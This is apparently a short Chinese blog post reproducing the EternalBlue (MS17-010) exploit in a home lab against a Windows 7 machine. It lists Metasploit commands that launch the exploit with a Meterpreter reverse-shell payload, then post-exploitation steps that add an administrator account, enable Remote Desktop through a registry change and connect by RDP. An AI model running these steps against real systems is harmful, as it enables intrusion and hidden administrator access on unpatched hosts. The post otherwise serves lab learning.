MS17-010(永恒之蓝)漏洞复现
开篇闲聊:
最后一篇,写完就睡觉。
漏洞概述:
就是传说中的永恒之蓝,百度上介绍的够详细了,不过我这个复现只是简易版本QAQ
复现环境:
Windows 7
Kail linux
复现过程:
直接开启神器搜索漏洞模块
root@wuyou:~# msfconsole
msf > search ms17-010
exploit/windows/smb/ms17_010_psexec为最新模块,成功率更高,但是有些情况下会出现要求指定SMBUser及SMBPass
这里我先用搜索模块对靶机进行漏洞扫描
结果为存在漏洞使用攻击模块,填写信息
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.190.131
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
攻击成功这里顺便再说一点后渗透命令吧:
创建用户名密码 blue/blue
C:\Windows\system32>net user blue blue /add
将用户blue添加入管理组
C:\Windows\system32>net localgroup administrators blue /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
远程桌面连接Win7
root@wuyou:~# rdesktop 192.168.190.131:3389